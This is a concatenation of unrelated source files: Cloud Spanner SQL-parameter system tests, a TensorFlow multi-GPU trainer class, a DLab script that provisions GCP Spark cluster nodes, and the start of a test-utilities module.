self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": []},
param_types={"v": array_type},
expected=[([],)],
order=False,
)
# Bind a null array of <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": None},
param_types={"v": array_type},
expected=[(None,)],
order=False,
)
def test_execute_sql_w_string_bindings(self):
self._bind_test_helper(STRING, "Phred", ["Phred", "Bharney"])
def test_execute_sql_w_bool_bindings(self):
self._bind_test_helper(BOOL, True, [True, False, True])
def test_execute_sql_w_int64_bindings(self):
self._bind_test_helper(INT64, 42, [123, 456, 789])
def test_execute_sql_w_float64_bindings(self):
self._bind_test_helper(FLOAT64, 42.3, [12.3, 456.0, 7.89])
def test_execute_sql_w_float_bindings_transfinite(self):
# Find -inf
self._check_sql_results(
self._db,
sql="SELECT @neg_inf",
params={"neg_inf": NEG_INF},
param_types={"neg_inf": Type(code=FLOAT64)},
expected=[(NEG_INF,)],
order=False,
)
# Find +inf
self._check_sql_results(
self._db,
sql="SELECT @pos_inf",
params={"pos_inf": POS_INF},
param_types={"pos_inf": Type(code=FLOAT64)},
expected=[(POS_INF,)],
order=False,
)
def test_execute_sql_w_bytes_bindings(self):
self._bind_test_helper(BYTES, b"DEADBEEF", [b"FACEDACE", b"DEADBEEF"])
def test_execute_sql_w_timestamp_bindings(self):
import pytz
from google.api_core.datetime_helpers import DatetimeWithNanoseconds
timestamp_1 = DatetimeWithNanoseconds(
1989, 1, 17, 17, 59, 12, nanosecond=345612789
)
timestamp_2 = DatetimeWithNanoseconds(
1989, 1, 17, 17, 59, 13, nanosecond=456127893
)
timestamps = [timestamp_1, timestamp_2]
# In round-trip, timestamps acquire a timezone value.
expected_timestamps = [
timestamp.replace(tzinfo=pytz.UTC) for timestamp in timestamps
]
self._recurse_into_lists = False
self._bind_test_helper(TIMESTAMP, timestamp_1, timestamps, expected_timestamps)
def test_execute_sql_w_date_bindings(self):
import datetime
dates = [SOME_DATE, SOME_DATE + datetime.timedelta(days=1)]
self._bind_test_helper(DATE, SOME_DATE, dates)
def test_execute_sql_w_query_param_struct(self):
NAME = "Phred"
COUNT = 123
SIZE = 23.456
HEIGHT = 188.0
WEIGHT = 97.6
record_type = param_types.Struct(
[
param_types.StructField("name", param_types.STRING),
param_types.StructField("count", param_types.INT64),
param_types.StructField("size", param_types.FLOAT64),
param_types.StructField(
"nested",
param_types.Struct(
[
param_types.StructField("height", param_types.FLOAT64),
param_types.StructField("weight", param_types.FLOAT64),
]
),
),
]
)
# Query with null struct, explicit type
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": None},
param_types={"r": record_type},
expected=[(None, None, None, None)],
order=False,
)
# Query with non-null struct, explicit type, NULL values
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": (None, None, None, None)},
param_types={"r": record_type},
expected=[(None, None, None, None)],
order=False,
)
# Query with non-null struct, explicit type, nested NULL values
self._check_sql_results(
self._db,
sql="SELECT @r.nested.weight",
params={"r": (None, None, None, (None, None))},
param_types={"r": record_type},
expected=[(None,)],
order=False,
)
# Query with non-null struct, explicit type
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": (NAME, COUNT, SIZE, (HEIGHT, WEIGHT))},
param_types={"r": record_type},
expected=[(NAME, COUNT, SIZE, WEIGHT)],
order=False,
)
# Query with empty struct, explicitly empty type
empty_type = param_types.Struct([])
self._check_sql_results(
self._db,
sql="SELECT @r IS NULL",
params={"r": ()},
param_types={"r": empty_type},
expected=[(False,)],
order=False,
)
# Query with null struct, explicitly empty type
self._check_sql_results(
self._db,
sql="SELECT @r IS NULL",
params={"r": None},
param_types={"r": empty_type},
expected=[(True,)],
order=False,
)
# Query with equality check for struct value
struct_equality_query = (
"SELECT " '@struct_param=STRUCT<threadf INT64, userf STRING>(1,"bob")'
)
struct_type = param_types.Struct(
[
param_types.StructField("threadf", param_types.INT64),
param_types.StructField("userf", param_types.STRING),
]
)
self._check_sql_results(
self._db,
sql=struct_equality_query,
params={"struct_param": (1, "bob")},
param_types={"struct_param": struct_type},
expected=[(True,)],
order=False,
)
# Query with nullness test for struct
self._check_sql_results(
self._db,
sql="SELECT @struct_param IS NULL",
params={"struct_param": None},
param_types={"struct_param": struct_type},
expected=[(True,)],
order=False,
)
# Query with null array-of-struct
array_elem_type = param_types.Struct(
[param_types.StructField("threadid", param_types.INT64)]
)
array_type = param_types.Array(array_elem_type)
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_arr_param) a",
params={"struct_arr_param": None},
param_types={"struct_arr_param": array_type},
expected=[],
order=False,
)
# Query with non-null array-of-struct
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_arr_param) a",
params={"struct_arr_param": [(123,), (456,)]},
param_types={"struct_arr_param": array_type},
expected=[(123,), (456,)],
order=False,
)
# Query with null array-of-struct field
struct_type_with_array_field = param_types.Struct(
[
param_types.StructField("intf", param_types.INT64),
param_types.StructField("arraysf", array_type),
]
)
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_param.arraysf) a",
params={"struct_param": (123, None)},
param_types={"struct_param": struct_type_with_array_field},
expected=[],
order=False,
)
# Query with non-null array-of-struct field
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_param.arraysf) a",
params={"struct_param": (123, ((456,), (789,)))},
param_types={"struct_param": struct_type_with_array_field},
expected=[(456,), (789,)],
order=False,
)
# Query with anonymous / repeated-name fields
anon_repeated_array_elem_type = param_types.Struct(
[
param_types.StructField("", param_types.INT64),
param_types.StructField("", param_types.STRING),
]
)
anon_repeated_array_type = param_types.Array(anon_repeated_array_elem_type)
self._check_sql_results(
self._db,
sql="SELECT CAST(t as STRUCT<threadid INT64, userid STRING>).* "
"FROM UNNEST(@struct_param) t",
params={"struct_param": [(123, "abcdef")]},
param_types={"struct_param": anon_repeated_array_type},
expected=[(123, "abcdef")],
order=False,
)
# Query and return a struct parameter
value_type = param_types.Struct(
[
param_types.StructField("message", param_types.STRING),
param_types.StructField("repeat", param_types.INT64),
]
)
value_query = (
"SELECT ARRAY(SELECT AS STRUCT message, repeat "
"FROM (SELECT @value.message AS message, "
"@value.repeat AS repeat)) AS value"
)
self._check_sql_results(
self._db,
sql=value_query,
params={"value": ("hello", 1)},
param_types={"value": value_type},
expected=[([["hello", 1]],)],
order=False,
)
def test_execute_sql_returning_transfinite_floats(self):
with self._db.snapshot(multi_use=True) as snapshot:
# Query returning -inf, +inf, NaN as column values
rows = list(
snapshot.execute_sql(
"SELECT "
'CAST("-inf" AS FLOAT64), '
'CAST("+inf" AS FLOAT64), '
'CAST("NaN" AS FLOAT64)'
)
)
self.assertEqual(len(rows), 1)
self.assertEqual(rows[0][0], float("-inf"))
self.assertEqual(rows[0][1], float("+inf"))
# NaNs cannot be compared by equality.
self.assertTrue(math.isnan(rows[0][2]))
# Query returning array of -inf, +inf, NaN as one column
rows = list(
snapshot.execute_sql(
"SELECT"
' [CAST("-inf" AS FLOAT64),'
' CAST("+inf" AS FLOAT64),'
' CAST("NaN" AS FLOAT64)]'
)
)
self.assertEqual(len(rows), 1)
float_array, = rows[0]
self.assertEqual(float_array[0], float("-inf"))
self.assertEqual(float_array[1], float("+inf"))
# NaNs cannot be searched for by equality.
self.assertTrue(math.isnan(float_array[2]))
def test_partition_query(self):
row_count = 40
sql = "SELECT * FROM {}".format(self.TABLE)
committed = self._set_up_table(row_count)
# Partitioned queries do not support ORDER BY
all_data_rows = set(self._row_data(row_count))
union = set()
batch_txn = self._db.batch_snapshot(read_timestamp=committed)
for batch in batch_txn.generate_query_batches(sql):
p_results_iter = batch_txn.process(batch)
# Lists aren't hashable so the results need to be converted
rows = [tuple(result) for result in p_results_iter]
union.update(set(rows))
self.assertEqual(union, all_data_rows)
batch_txn.close()
class TestStreamingChunking(unittest.TestCase, _TestData):
@classmethod
def setUpClass(cls):
from tests.system.utils.streaming_utils import INSTANCE_NAME
from tests.system.utils.streaming_utils import DATABASE_NAME
instance = Config.CLIENT.instance(INSTANCE_NAME)
if not instance.exists():
raise unittest.SkipTest(
"Run 'tests/system/utils/populate_streaming.py' to enable."
)
database = instance.database(DATABASE_NAME)
if not database.exists():
raise unittest.SkipTest(
"Run 'tests/system/utils/populate_streaming.py' to enable."
)
cls._db = database
def _verify_one_column(self, table_desc):
sql = "SELECT chunk_me FROM {}".format(table_desc.table)
with self._db.snapshot() as snapshot:
rows = list(snapshot.execute_sql(sql))
self.assertEqual(len(rows), table_desc.row_count)
expected = table_desc.value()
for row in rows:
self.assertEqual(row[0], expected)
def _verify_two_columns(self, table_desc):
sql = "SELECT chunk_me, chunk_me_2 FROM {}".format(table_desc.table)
with self._db.snapshot() as snapshot:
rows = list(snapshot.execute_sql(sql))
self.assertEqual(len(rows), table_desc.row_count)
expected = table_desc.value()
for row in rows:
self.assertEqual(row[0], expected)
self.assertEqual(row[1], expected)
def test_four_kay(self):
from tests.system.utils.streaming_utils import FOUR_KAY
self._verify_one_column(FOUR_KAY)
def test_forty_kay(self):
from tests.system.utils.streaming_utils import FORTY_KAY
self._verify_one_column(FORTY_KAY)
def test_four_hundred_kay(self):
from tests.system.utils.streaming_utils import FOUR_HUNDRED_KAY
self._verify_one_column(FOUR_HUNDRED_KAY)
def test_four_meg(self):
from tests.system.utils.streaming_utils import FOUR_MEG
self._verify_two_columns(FOUR_MEG)
class CustomException(Exception):
"""Placeholder for any user-defined exception."""
class _DatabaseDropper(object):
"""Helper for cleaning up databases created on-the-fly."""
def __init__(self, db):
self._db = db
def delete(self):
self._db.drop()
class _ReadAbortTrigger(object):
"""Helper for tests provoking abort-during-read."""
KEY1 = "key1"
KEY2 = "key2"
def __init__(self):
self.provoker_started = threading.Event()
self.provoker_done = threading.Event()
self.handler_running = threading.Event()
self.handler_done = threading.Event()
def _provoke_abort_unit_of_work(self, transaction):
keyset = KeySet(keys=[(self.KEY1,)])
rows = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
assert len(rows) == 1
row = rows[0]
value = row[1]
self.provoker_started.set()
self.handler_running.wait()
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[self.KEY1, value + 1]])
def provoke_abort(self, database):
database.run_in_transaction(self._provoke_abort_unit_of_work)
self.provoker_done.set()
def _handle_abort_unit_of_work(self, transaction):
keyset_1 = KeySet(keys=[(self.KEY1,)])
rows_1 = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset_1))
assert len(rows_1) == 1
row_1 = rows_1[0]
value_1 = row_1[1]
self.handler_running.set()
self.provoker_done.wait()
keyset_2 = KeySet(keys=[(self.KEY2,)])
rows_2 = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset_2))
assert len(rows_2) == 1
row_2 = rows_2[0]
value_2 = row_2[1]
transaction.update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[self.KEY2, value_1 + value_2]]
)
def handle_abort(self, database):
database.run_in_transaction(self._handle_abort_unit_of_work)
self.handler_done.set()
class FauxCall(object):
def __init__(self, code, details="FauxCall"):
self._code = code
self._details = details
def initial_metadata(self):
return {}
def trailing_metadata(self):
return {}
def code(self):
return self._code
def details(self):
return self._details
|
multigpu.py | #-*- coding: utf-8 -*-
#File: multigpu.py
#Author: yobobobo(zhouboacmer@qq.com)
import numpy as np
import tensorflow as tf
from tensorgo.utils import logger
from tensorgo.train.config import TrainConfig
from tensorgo.tfutils.gradient import record_variable, update_variable, \
compute_worker_gradient, apply_worker_gradients, sync_variable, fetch_all_vars
import time
import threading
__all__ = ['MultiGpuTrainer']
class MultiGpuTrainer(object):
def __init__(self, config):
assert isinstance(config, TrainConfig), type(config)
self._model = config.model
self._dataset = config.dataset
self._config = config
self.batch_count = 0
self._work_train_op = []
self._server_param = []
self._worker_param = []
self._deltas = []
self._wrap_delta = []
self._sync_worker = []
self._setup_inputs()
self._setup()
self._adam_varlist = []
def _setup_inputs(self):
with tf.device('/cpu:0'):
dataset = self._dataset
self._data_iter = tf.contrib.data.Iterator.from_structure(dataset.output_types, \
dataset.output_shapes)
self._init_data_op = self._data_iter.make_initializer(dataset)
def update_inputs(self, dataset):
self._init_data_op = self._data_iter.make_initializer(dataset)
self._sess.run(self._init_data_op)
def _setup(self):
opt = self._model.get_optimizer()
with tf.variable_scope(tf.get_variable_scope()):
for i in range(self._config.n_towers):
logger.info('building tower:{}'.format(i))
with tf.device('/gpu:{}'.format(i)):
with tf.variable_scope('tower_{}'.format(i)):
loss = self._model.build_graph(self._data_iter)
varlist = tf.trainable_variables()
val_keyword = 'tower_{}'.format(i)
varlist = list(filter(lambda x: val_keyword in x.name, varlist))  # materialize: this list is stored and re-used
self._worker_param.append(varlist)
# record server model
if i == 0:
with tf.device('/cpu:0'):
self._server_param = record_variable(varlist)
#push & pull
sync_worker = update_variable(self._server_param, varlist)
with tf.device('/cpu:0'):
delta = compute_worker_gradient(self._server_param, varlist)
wrap_delta = apply_worker_gradients(opt, self._server_param, delta, scale=(1.0 / self._config.n_towers) * 0.5)
self._sync_worker.extend(sync_worker)
self._deltas.extend(delta)
self._wrap_delta.append(wrap_delta)
# end
worker_train_op = opt.minimize(loss)
self._work_train_op.append(worker_train_op)
# init session
self._sess = tf.Session(config=tf.ConfigProto(
log_device_placement=False,
allow_soft_placement=True,
gpu_options=tf.GPUOptions(per_process_gpu_memory_fraction=1.0, allow_growth=True)
))
# init graph
self.init_graph()
# init input
self._sess.run(self._init_data_op)
# Keep the Adam optimizer's slot variables (moment accumulators) so
# _reset_adam() can reinitialize them after a sync.
self._adam_varlist = [var for var in tf.global_variables() if 'Adam' in var.name]
def init_graph(self):
"""Init worker and server variables; all variables should be identical after initialization."""
logger.info("Initializing global parameters")
init = tf.global_variables_initializer()
self._sess.run(init)
# Use the first worker's parameters as the global initial parameters.
# NOTE: the early return below leaves the explicit sync ops that follow disabled.
return
for i in range(1, self._config.n_towers):
sync_op = sync_variable(self._worker_param[0], self._worker_param[i])
self._sess.run(sync_op)
sync_server_op = sync_variable(self._worker_param[0], self._server_param)
self._sess.run(sync_server_op)
logger.info("Global parameters synced; all parameters are the same")
def push_and_pull(self):
"""aggregate workers' gradient to server and sync the model of workers"""
# unnecessary to sync model when there is only one worker
if self._config.n_towers == 1:
return
start = time.time()
wrap_gradients = self._deltas + self._wrap_delta
#self._sess.run(self._deltas)
self._sess.run(wrap_gradients)
# apply the 0.5-scaled delta twice for better/faster convergence
self._sess.run(self._wrap_delta)
self._sess.run(self._sync_worker)
elapsed = (time.time() - start)
#self._reset_adam()
logger.info("[push_and_pull] need:{} seconds to sync the model".format(elapsed))
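# _reset_adam reinitializes the optimizer's moment accumulators, whose
# statistics refer to pre-sync weights once averaged parameters are pushed
# (currently only referenced via the commented-out call above).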
def _reset_adam(self):
op_list = [var.assign(var.initialized_value()) for var in self._adam_varlist]
self._sess.run(op_list)
def run(self, fetches=None, feed_dict=None, test=False, one_worker=False):
"""
Args:
fetches: A single graph element, or a list of graph elements
feed_dict: A dictionary that maps graph elements to values
test: if True, skip the train op (evaluation mode)
one_worker: use only one worker (often used in evaluation, where it preserves the data order)
"""
fetches = [] if fetches is None else list(fetches)  # copy: avoids the mutable-default pitfall and never mutates the caller's list
if self.batch_count % self._config.commbatch == 0 and not test:
logger.info('[run] batch_count:{} sync the worker'.format(self.batch_count))
# Run the sync in a background thread so the towers keep training; the
# thread is never joined, so a sync may overlap subsequent batches.
t = threading.Thread(target=self.push_and_pull)
t.start()
logger.info('[run] batch_count:{} sync thread started'.format(self.batch_count))
if not one_worker:
final_fetches = fetch_all_vars(self._worker_param, fetches, self._config.n_towers)
else:
final_fetches = fetches
if not test:
final_fetches.append(self._work_train_op)
self.batch_count += 1
ret = self._sess.run(final_fetches, feed_dict=feed_dict)
# reorganize its output
if len(fetches) == 0:
return []
else:
merge_ret = []
fetches_num = len(fetches)
for i in range(fetches_num):
if one_worker:
merge_ret.append(ret[i])
else:
merge_ret.append(np.concatenate(ret[i]))
return merge_ret
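# Example usage (a minimal sketch; the TrainConfig fields and `model.loss`
# below are placeholders, not guaranteed by this module):
#
#   config = TrainConfig(model=model, dataset=dataset, n_towers=2, commbatch=100)
#   trainer = MultiGpuTrainer(config)
#   for _ in range(num_batches):
#       loss_vals = trainer.run(fetches=[model.loss])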
|
dataengine_configure.py | #!/usr/bin/python
# *****************************************************************************
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# ******************************************************************************
import json
import time
from fabric.api import *
import dlab.fab
import dlab.actions_lib
import dlab.meta_lib
import traceback
import sys
import os
import uuid
import logging
from Crypto.PublicKey import RSA
import multiprocessing
def configure_slave(slave_number, data_engine):
slave_name = data_engine['slave_node_name'] + '{}'.format(slave_number + 1)
slave_hostname = GCPMeta.get_private_ip_address(slave_name)
try:
logging.info('[CREATING DLAB SSH USER ON SLAVE NODE]')
print('[CREATING DLAB SSH USER ON SLAVE NODE]')
params = "--hostname {} --keyfile {} --initial_user {} --os_user {} --sudo_group {}".format \
(slave_hostname, os.environ['conf_key_dir'] + data_engine['key_name'] + ".pem", initial_user,
data_engine['dlab_ssh_user'], sudo_group)
try:
local("~/scripts/{}.py {}".format('create_ssh_user', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
clear_resources()
dlab.fab.append_result("Failed to create ssh user on slave.", str(err))
sys.exit(1)
try:
print('[INSTALLING USERs KEY ON SLAVE NODE]')
logging.info('[INSTALLING USERs KEY ON SLAVE NODE]')
additional_config = {"user_keyname": data_engine['project_name'],
"user_keydir": os.environ['conf_key_dir']}
params = "--hostname {} --keyfile {} --additional_config '{}' --user {}".format(
slave_hostname, os.environ['conf_key_dir'] + data_engine['key_name'] + ".pem", json.dumps(
additional_config), data_engine['dlab_ssh_user'])
try:
local("~/scripts/{}.py {}".format('install_user_key', params))
except:
dlab.fab.append_result("Failed installing users key")
raise Exception
except Exception as err:
clear_resources()
dlab.fab.append_result("Failed to install ssh user key on slave.", str(err))
sys.exit(1)
try:
logging.info('[CONFIGURE PROXY ON SLAVE NODE]')
print('[CONFIGURE PROXY ON SLAVE NODE]')
additional_config = {"proxy_host": edge_instance_name, "proxy_port": "3128"}
params = "--hostname {} --instance_name {} --keyfile {} --additional_config '{}' --os_user {}"\
.format(slave_hostname, slave_name, keyfile_name, json.dumps(additional_config),
data_engine['dlab_ssh_user'])
try:
local("~/scripts/{}.py {}".format('common_configure_proxy', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
clear_resources()
dlab.fab.append_result("Failed to configure proxy on slave.", str(err))
sys.exit(1)
try:
logging.info('[INSTALLING PREREQUISITES ON SLAVE NODE]')
print('[INSTALLING PREREQUISITES ON SLAVE NODE]')
params = "--hostname {} --keyfile {} --user {} --region {} --edge_private_ip {}". \
format(slave_hostname, keyfile_name, data_engine['dlab_ssh_user'], data_engine['region'],
edge_instance_private_ip)
try:
local("~/scripts/{}.py {}".format('install_prerequisites', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
clear_resources()
dlab.fab.append_result("Failed to install prerequisites on slave.", str(err))
sys.exit(1)
try:
logging.info('[CONFIGURE SLAVE NODE {}]'.format(slave_number + 1))
print('[CONFIGURE SLAVE NODE {}]'.format(slave_number + 1))
params = "--hostname {} --keyfile {} --region {} --spark_version {} --hadoop_version {} --os_user {} " \
"--scala_version {} --r_mirror {} --master_ip {} --node_type {}". \
format(slave_hostname, keyfile_name, data_engine['region'], os.environ['notebook_spark_version'],
os.environ['notebook_hadoop_version'], data_engine['dlab_ssh_user'],
os.environ['notebook_scala_version'], os.environ['notebook_r_mirror'], master_node_hostname,
'slave')
try:
local("~/scripts/{}.py {}".format('configure_dataengine', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
clear_resources()
dlab.fab.append_result("Failed to configure slave node.", str(err))
sys.exit(1)
def clear_resources():
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i + 1)
GCPActions.remove_instance(slave_name, data_engine['zone'])
GCPActions.remove_instance(data_engine['master_node_name'], data_engine['zone'])
if __name__ == "__main__":
local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['project_name'],
os.environ['request_id'])
local_log_filepath = "/logs/" + os.environ['conf_resource'] + "/" + local_log_filename
logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s',
level=logging.INFO,
filename=local_log_filepath)
try:
GCPMeta = dlab.meta_lib.GCPMeta()
GCPActions = dlab.actions_lib.GCPActions()
print('Generating infrastructure names and tags')
data_engine = dict()
data_engine['service_base_name'] = (os.environ['conf_service_base_name'])
data_engine['edge_user_name'] = (os.environ['edge_user_name'])
data_engine['project_name'] = (os.environ['project_name']).replace('_', '-').lower()
data_engine['endpoint_name'] = os.environ['endpoint_name'].replace('_', '-').lower()
data_engine['endpoint_tag'] = data_engine['endpoint_name']
data_engine['region'] = os.environ['gcp_region']
data_engine['zone'] = os.environ['gcp_zone']
try:
if os.environ['gcp_vpc_name'] == '':
raise KeyError
else:
data_engine['vpc_name'] = os.environ['gcp_vpc_name']
except KeyError:
data_engine['vpc_name'] = '{}-vpc'.format(data_engine['service_base_name'])
if 'exploratory_name' in os.environ:
data_engine['exploratory_name'] = os.environ['exploratory_name'].replace('_', '-').lower()
else:
data_engine['exploratory_name'] = ''
if 'computational_name' in os.environ:
data_engine['computational_name'] = os.environ['computational_name'].replace('_', '-').lower()
else:
data_engine['computational_name'] = ''
data_engine['subnet_name'] = '{0}-{1}-{2}-subnet'.format(data_engine['service_base_name'],
data_engine['project_name'],
data_engine['endpoint_name'])
data_engine['master_size'] = os.environ['gcp_dataengine_master_size']
data_engine['slave_size'] = os.environ['gcp_dataengine_slave_size']
data_engine['key_name'] = os.environ['conf_key_name']
data_engine['ssh_key_path'] = '{0}{1}.pem'.format(os.environ['conf_key_dir'], data_engine['key_name'])
data_engine['dataengine_service_account_name'] = '{}-{}-{}-ps-sa'.format(data_engine['service_base_name'],
data_engine['project_name'],
data_engine['endpoint_name'])
if os.environ['conf_os_family'] == 'debian':
initial_user = 'ubuntu'
sudo_group = 'sudo'
elif os.environ['conf_os_family'] == 'redhat':
initial_user = 'ec2-user'
sudo_group = 'wheel'
data_engine['cluster_name'] = "{}-{}-{}-de-{}".format(data_engine['service_base_name'],
data_engine['project_name'],
data_engine['endpoint_name'],
data_engine['computational_name'])
data_engine['master_node_name'] = data_engine['cluster_name'] + '-m'
data_engine['slave_node_name'] = data_engine['cluster_name'] + '-s'
data_engine['instance_count'] = int(os.environ['dataengine_instance_count'])
data_engine['notebook_name'] = os.environ['notebook_instance_name']
data_engine['gpu_accelerator_type'] = 'None'
if os.environ['application'] in ('tensor', 'deeplearning'):
data_engine['gpu_accelerator_type'] = os.environ['gcp_gpu_accelerator_type']
data_engine['network_tag'] = '{0}-{1}-{2}-ps'.format(data_engine['service_base_name'],
data_engine['project_name'],
data_engine['endpoint_name'])
master_node_hostname = GCPMeta.get_private_ip_address(data_engine['master_node_name'])
edge_instance_name = '{0}-{1}-{2}-edge'.format(data_engine['service_base_name'],
data_engine['project_name'], data_engine['endpoint_tag'])
edge_instance_hostname = GCPMeta.get_instance_public_ip_by_name(edge_instance_name)
edge_instance_private_ip = GCPMeta.get_private_ip_address(edge_instance_name)
data_engine['dlab_ssh_user'] = os.environ['conf_os_user']
keyfile_name = "{}{}.pem".format(os.environ['conf_key_dir'], os.environ['conf_key_name'])
except Exception as err:
clear_resources()
dlab.fab.append_result("Failed to generate variables dictionary.", str(err))
sys.exit(1)
try:
logging.info('[CREATING DLAB SSH USER ON MASTER NODE]')
print('[CREATING DLAB SSH USER ON MASTER NODE]')
params = "--hostname {} --keyfile {} --initial_user {} --os_user {} --sudo_group {}".format\
(master_node_hostname, os.environ['conf_key_dir'] + data_engine['key_name'] + ".pem", initial_user,
data_engine['dlab_ssh_user'], sudo_group)
try:
local("~/scripts/{}.py {}".format('create_ssh_user', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
clear_resources()
dlab.fab.append_result("Failed to create ssh user on master.", str(err))
sys.exit(1)
try:
print('[INSTALLING USERs KEY ON MASTER NODE]')
logging.info('[INSTALLING USERs KEY ON MASTER NODE]')
additional_config = {"user_keyname": data_engine['project_name'],
"user_keydir": os.environ['conf_key_dir']}
params = "--hostname {} --keyfile {} --additional_config '{}' --user {}".format(
master_node_hostname, os.environ['conf_key_dir'] + data_engine['key_name'] + ".pem",
json.dumps(additional_config), data_engine['dlab_ssh_user'])
try:
local("~/scripts/{}.py {}".format('install_user_key', params))
except:
dlab.fab.append_result("Failed installing users key")
raise Exception
except Exception as err:
clear_resources()
dlab.fab.append_result("Failed to install ssh user key on master.", str(err))
sys.exit(1)
try:
logging.info('[CONFIGURE PROXY ON MASTER NODE]')
print('[CONFIGURE PROXY ON MASTER NODE]')
additional_config = {"proxy_host": edge_instance_name, "proxy_port": "3128"}
params = "--hostname {} --instance_name {} --keyfile {} --additional_config '{}' --os_user {}"\
.format(master_node_hostname, data_engine['master_node_name'], keyfile_name, json.dumps(additional_config),
data_engine['dlab_ssh_user'])
try:
local("~/scripts/{}.py {}".format('common_configure_proxy', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
clear_resources()
dlab.fab.append_result("Failed to configure proxy on master.", str(err))
sys.exit(1)
try:
logging.info('[INSTALLING PREREQUISITES ON MASTER NODE]')
print('[INSTALLING PREREQUISITES ON MASTER NODE]')
params = "--hostname {} --keyfile {} --user {} --region {} --edge_private_ip {}".\
format(master_node_hostname, keyfile_name, data_engine['dlab_ssh_user'], data_engine['region'],
edge_instance_private_ip)
try:
local("~/scripts/{}.py {}".format('install_prerequisites', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
clear_resources()
dlab.fab.append_result("Failed to install prerequisites on master.", str(err))
sys.exit(1)
try:
logging.info('[CONFIGURE MASTER NODE]')
print('[CONFIGURE MASTER NODE]')
params = "--hostname {} --keyfile {} --region {} --spark_version {} --hadoop_version {} --os_user {} " \
"--scala_version {} --r_mirror {} --master_ip {} --node_type {}".\
format(master_node_hostname, keyfile_name, data_engine['region'], os.environ['notebook_spark_version'],
os.environ['notebook_hadoop_version'], data_engine['dlab_ssh_user'],
os.environ['notebook_scala_version'], os.environ['notebook_r_mirror'], master_node_hostname,
'master')
try:
local("~/scripts/{}.py {}".format('configure_dataengine', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
dlab.fab.append_result("Failed to configure master node", str(err))
clear_resources()
sys.exit(1)
try:
jobs = []
for slave in range(data_engine['instance_count'] - 1):
p = multiprocessing.Process(target=configure_slave, args=(slave, data_engine))
jobs.append(p)
p.start()
for job in jobs:
job.join()
for job in jobs:
if job.exitcode != 0:
raise Exception
except Exception as err:
dlab.fab.append_result("Failed to configure slave nodes", str(err))
clear_resources()
sys.exit(1)
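# Each slave is configured in its own process; configure_slave() calls
# sys.exit(1) on failure, so any non-zero child exitcode aborts the whole
# provisioning run once all joins complete.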
try:
print('[SETUP EDGE REVERSE PROXY TEMPLATE]')
logging.info('[SETUP EDGE REVERSE PROXY TEMPLATE]')
notebook_instance_ip = GCPMeta.get_private_ip_address(data_engine['notebook_name'])
additional_info = {
"computational_name": data_engine['computational_name'],
"master_node_hostname": master_node_hostname,
"notebook_instance_ip": notebook_instance_ip,
"instance_count": data_engine['instance_count'],
"master_node_name": data_engine['master_node_name'],
"slave_node_name": data_engine['slave_node_name'],
"tensor": False
}
params = "--edge_hostname {} " \
"--keyfile {} " \
"--os_user {} " \
"--type {} " \
"--exploratory_name {} " \
"--additional_info '{}'"\
.format(edge_instance_hostname,
keyfile_name,
data_engine['dlab_ssh_user'],
'spark',
data_engine['exploratory_name'],
json.dumps(additional_info))
try:
local("~/scripts/{}.py {}".format('common_configure_reverse_proxy', params))
except:
dlab.fab.append_result("Failed edge reverse proxy template")
raise Exception
except Exception as err:
dlab.fab.append_result("Failed to configure reverse proxy", str(err))
clear_resources()
sys.exit(1)
try:
ip_address = GCPMeta.get_private_ip_address(data_engine['master_node_name'])
spark_master_url = "http://" + ip_address + ":8080"
spark_master_access_url = "https://" + edge_instance_hostname + "/{}/".format(
data_engine['exploratory_name'] + '_' + data_engine['computational_name'])
logging.info('[SUMMARY]')
print('[SUMMARY]')
print("Service base name: {}".format(data_engine['service_base_name']))
print("Region: {}".format(data_engine['region']))
print("Cluster name: {}".format(data_engine['cluster_name']))
print("Master node shape: {}".format(data_engine['master_size']))
print("Slave node shape: {}".format(data_engine['slave_size']))
print("Instance count: {}".format(str(data_engine['instance_count'])))
with open("/root/result.json", 'w') as result:
res = {"hostname": data_engine['cluster_name'],
"instance_id": data_engine['master_node_name'],
"key_name": data_engine['key_name'],
"Action": "Create new Data Engine",
"computational_url": [
{"description": "Apache Spark Master",
"url": spark_master_access_url},
# {"description": "Apache Spark Master (via tunnel)",
# "url": spark_master_url}
]
}
print(json.dumps(res))
result.write(json.dumps(res))
except Exception as err:
dlab.fab.append_result("Error with writing results", str(err))
clear_resources()
sys.exit(1)
|
common_utils.py | r"""Importing this file must **not** initialize CUDA context. test_distributed
relies on this assumption to properly run. This means that when this is imported
